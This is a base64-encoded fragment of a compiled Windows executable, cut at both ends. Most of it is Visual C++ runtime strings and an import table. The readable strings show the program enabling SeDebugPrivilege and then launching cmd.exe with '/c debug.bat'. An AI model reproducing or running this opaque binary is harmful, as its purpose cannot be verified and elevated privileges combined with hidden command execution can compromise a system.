QBvAHUAcgAgAGEAcABwAGwAaQBjAGEAdABpAG8AbgAuAA0ACgAAAAAAUgA2ADAAMwAwAA0ACgAtACAAQwBSAFQAIABuAG8AdAAgAGkAbgBpAHQAaQBhAGwAaQB6AGUAZAANAAoAAAAAAAAAAAAAAAAAUgA2ADAAMgA4AA0ACgAtACAAdQBuAGEAYgBsAGUAIAB0AG8AIABpAG4AaQB0AGkAYQBsAGkAegBlACAAaABlAGEAcAANAAoAAAAAAAAAAABSADYAMAAyADcADQAKAC0AIABuAG8AdAAgAGUAbgBvAHUAZwBoACAAcwBwAGEAYwBlACAAZgBvAHIAIABsAG8AdwBpAG8AIABpAG4AaQB0AGkAYQBsAGkAegBhAHQAaQBvAG4ADQAKAAAAAAAAAAAAUgA2ADAAMgA2AA0ACgAtACAAbgBvAHQAIABlAG4AbwB1AGcAaAAgAHMAcABhAGMAZQAgAGYAbwByACAAcwB0AGQAaQBvACAAaQBuAGkAdABpAGEAbABpAHoAYQB0AGkAbwBuAA0ACgAAAAAAAAAAAFIANgAwADIANQANAAoALQAgAHAAdQByAGUAIAB2AGkAcgB0AHUAYQBsACAAZgB1AG4AYwB0AGkAbwBuACAAYwBhAGwAbAANAAoAAAAAAAAAUgA2ADAAMgA0AA0ACgAtACAAbgBvAHQAIABlAG4AbwB1AGcAaAAgAHMAcABhAGMAZQAgAGYAbwByACAAXwBvAG4AZQB4AGkAdAAvAGEAdABlAHgAaQB0ACAAdABhAGIAbABlAA0ACgAAAAAAAAAAAFIANgAwADEAOQANAAoALQAgAHUAbgBhAGIAbABlACAAdABvACAAbwBwAGUAbgAgAGMAbwBuAHMAbwBsAGUAIABkAGUAdgBpAGMAZQANAAoAAAAAAAAAAAAAAAAAAAAAAFIANgAwADEAOAANAAoALQAgAHUAbgBlAHgAcABlAGMAdABlAGQAIABoAGUAYQBwACAAZQByAHIAbwByAA0ACgAAAAAAAAAAAAAAAAAAAAAAUgA2ADAAMQA3AA0ACgAtACAAdQBuAGUAeABwAGUAYwB0AGUAZAAgAG0AdQBsAHQAaQB0AGgAcgBlAGEAZAAgAGwAbwBjAGsAIABlAHIAcgBvAHIADQAKAAAAAAAAAAAAUgA2ADAAMQA2AA0ACgAtACAAbgBvAHQAIABlAG4AbwB1AGcAaAAgAHMAcABhAGMAZQAgAGYAbwByACAAdABoAHIAZQBhAGQAIABkAGEAdABhAA0ACgAAAAAAAAAAAAAAUgA2ADAAMQAwAA0ACgAtACAAYQBiAG8AcgB0ACgAKQAgAGgAYQBzACAAYgBlAGUAbgAgAGMAYQBsAGwAZQBkAA0ACgAAAAAAAAAAAAAAAABSADYAMAAwADkADQAKAC0AIABuAG8AdAAgAGUAbgBvAHUAZwBoACAAcwBwAGEAYwBlACAAZgBvAHIAIABlAG4AdgBpAHIAbwBuAG0AZQBuAHQADQAKAAAAAAAAAAAAAABSADYAMAAwADgADQAKAC0AIABuAG8AdAAgAGUAbgBvAHUAZwBoACAAcwBwAGEAYwBlACAAZgBvAHIAIABhAHIAZwB1AG0AZQBuAHQAcwANAAoAAAAAAAAAAAAAAAAAAABSADYAMAAwADIADQAKAC0AIABmAGwAbwBhAHQAaQBuAGcAIABwAG8AaQBuAHQAIABzAHUAcABwAG8AcgB0ACAAbgBvAHQAIABsAG8AYQBkAGUAZAANAAoAAAAAAAAAAAACAAAAAAAAAFCAAIABAAAACAAAAAAAAADwfwCAAQAAAAkAAAAAAAAAkH8AgAEAAAAKAAAAAAAAAEB/AIABAAAAEAAAAAAAAADgfgCAAQAAABEAAAAAAAAAgH4AgAEAAAASAAAAAAAAADB+AIABAAAAEwAAAAAAAADQfQCAAQAAABgAAAAAAAAAYH0AgAEAAAAZAAAAAAAAABB9AIABAAAAGgAAAAAAAACgfACAAQAAABsAAAAAAAAAMHwAgAEAAAAcAAAAAAAAAOB7AIABAAAAHgAAAAAAAACYewCAAQAAAB8AAAAAAAAA0HoAgAEAAAAgAAAAAAAAAGB6AIABAAAAIQAAAAAAAABweACAAQAAAHgAAAAAAAAASHgAgAEAAAB5AAAAAAAAACh4AIABAAAAegAAAAAAAAAIeACAAQAAAPwAAAAAAAAAAHgAgAEAAAD/AAAAAAAAAOB3AIABAAAATQBpAGMAcgBvAHMAbwBmAHQAIABWAGkAcwB1AGEAbAAgAEMAKwArACAAUgB1AG4AdABpAG0AZQAgAEwAaQBiAHIAYQByAHkAAAAAAAoACgAAAAAAAAAAAC4ALgAuAAAAPABwAHIAbwBnAHIAYQBtACAAbgBhAG0AZQAgAHUAbgBrAG4AbwB3AG4APgAAAAAAUgB1AG4AdABpAG0AZQAgAEUAcgByAG8AcgAhAAoACgBQAHIAbwBnAHIAYQBtADoAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgACAAIAAgACAAIAAgACAAIAAoACgAKAAoACgAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAASAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEACEAIQAhACEAIQAhACEAIQAhACEABAAEAAQABAAEAAQABAAgQCBAIEAgQCBAIEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABABAAEAAQABAAEAAQAIIAggCCAIIAggCCAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAQABAAEAAQACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAgACAAIAAgACAAIAAgACAAaAAoACgAK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HZiYXNlIGNvcHkgY29uc3RydWN0b3IgaXRlcmF0b3InAAAAAABgZWggdmVjdG9yIGNvcHkgY29uc3RydWN0b3IgaXRlcmF0b3InAAAAYG1hbmFnZWQgdmVjdG9yIGRlc3RydWN0b3IgaXRlcmF0b3InAAAAAGBtYW5hZ2VkIHZlY3RvciBjb25zdHJ1Y3RvciBpdGVyYXRvcicAAABgcGxhY2VtZW50IGRlbGV0ZVtdIGNsb3N1cmUnAAAAAGBwbGFjZW1lbnQgZGVsZXRlIGNsb3N1cmUnAAAAAAAAYG9tbmkgY2FsbHNpZycAACBkZWxldGVbXQAAACBuZXdbXQAAAAAAAGBsb2NhbCB2ZnRhYmxlIGNvbnN0cnVjdG9yIGNsb3N1cmUnAAAAAABgbG9jYWwgdmZ0YWJsZScAYFJUVEkAAABgRUgAAAAAAGB1ZHQgcmV0dXJuaW5nJwBgY29weSBjb25zdHJ1Y3RvciBjbG9zdXJlJwAAAAAAAGBlaCB2ZWN0b3IgdmJhc2UgY29uc3RydWN0b3IgaXRlcmF0b3InAABgZWggdmVjdG9yIGRlc3RydWN0b3IgaXRlcmF0b3InAGBlaCB2ZWN0b3IgY29uc3RydWN0b3IgaXRlcmF0b3InAAAAAAAAAABgdmlydHVhbCBkaXNwbGFjZW1lbnQgbWFwJwAAAAAAAGB2ZWN0b3IgdmJhc2UgY29uc3RydWN0b3IgaXRlcmF0b3InAAAAAABgdmVjdG9yIGRlc3RydWN0b3IgaXRlcmF0b3InAAAAAGB2ZWN0b3IgY29uc3RydWN0b3IgaXRlcmF0b3InAAAAYHNjYWxhciBkZWxldGluZyBkZXN0cnVjdG9yJwAAAABgZGVmYXVsdCBjb25zdHJ1Y3RvciBjbG9zdXJlJwAAAGB2ZWN0b3IgZGVsZXRpbmcgZGVzdHJ1Y3RvcicAAAAAYHZiYXNlIGRlc3RydWN0b3InAAAAAAAAYHN0cmluZycAAAAAAAAAAGBsb2NhbCBzdGF0aWMgZ3VhcmQnAAAAAGB0eXBlb2YnAAAAAAAAAABgdmNhbGwnAGB2YnRhYmxlJwAAAAAAAABgdmZ0YWJsZScAAABePQAAfD0AACY9AAA8PD0APj49ACU9AAAvPQAALT0AACs9AAAqPQAAfHwAACYmAAB8AAAAXgAAAH4AA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ACMogAAAAAAAKKiAAAAAAAAsKIAAAAAAAC+ogAAAAAAAMyiAAAAAAAA5qIAAAAAAAD2ogAAAAAAAAyjAAAAAAAAJqMAAAAAAAAyowAAAAAAAESjAAAAAAAAWKMAAAAAAABwowAAAAAAAIijAAAAAAAAlKMAAAAAAACeowAAAAAAAKqjAAAAAAAAvKMAAAAAAADKowAAAAAAANqjAAAAAAAA5qMAAAAAAAD8owAAAAAAAAikAAAAAAAAGKQAAAAAAAAupAAAAAAAAAAAAAAAAAAAAqAAAAAAAAAAAAAAAAAAAMYBR2V0Q3VycmVudFByb2Nlc3MAwARTbGVlcABSAENsb3NlSGFuZGxlAEtFUk5FTDMyLmRsbAAA9wFPcGVuUHJvY2Vzc1Rva2VuAACWAUxvb2t1cFByaXZpbGVnZVZhbHVlQQAfAEFkanVzdFRva2VuUHJpdmlsZWdlcwBBRFZBUEkzMi5kbGwAAB4BU2hlbGxFeGVjdXRlQQBTSEVMTDMyLmRsbADLAUdldEN1cnJlbnRUaHJlYWRJZAAAWwFGbHNTZXRWYWx1ZQCMAUdldENvbW1hbmRMaW5lQQDOBFRlcm1pbmF0ZVByb2Nlc3MAAOIEVW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAACzBFNldFVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgACA0lzRGVidWdnZXJQcmVzZW50ACYEUnRsVmlydHVhbFVud2luZAAAHwRSdGxMb29rdXBGdW5jdGlvbkVudHJ5AAAYBFJ0bENhcHR1cmVDb250ZXh0ACUEUnRsVW53aW5kRXgA7gBFbmNvZGVQb2ludGVyAFoBRmxzR2V0VmFsdWUAWQFGbHNGcmVlAIAEU2V0TGFzdEVycm9yAAAIAkdldExhc3RFcnJvcgAAWAFGbHNBbGxvYwAA1wJIZWFwRnJlZQAATAJHZXRQcm9jQWRkcmVzcwAAHgJHZXRNb2R1bGVIYW5kbGVXAAAfAUV4aXRQcm9jZXNzAMsARGVjb2RlUG9pbnRlcgB8BFNldEhhbmRsZUNvdW50AABrAkdldFN0ZEhhbmRsZQAA6wJJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uQW5kU3BpbkNvdW50APoBR2V0RmlsZVR5cGUAagJHZXRTdGFydHVwSW5mb1cA0gBEZWxld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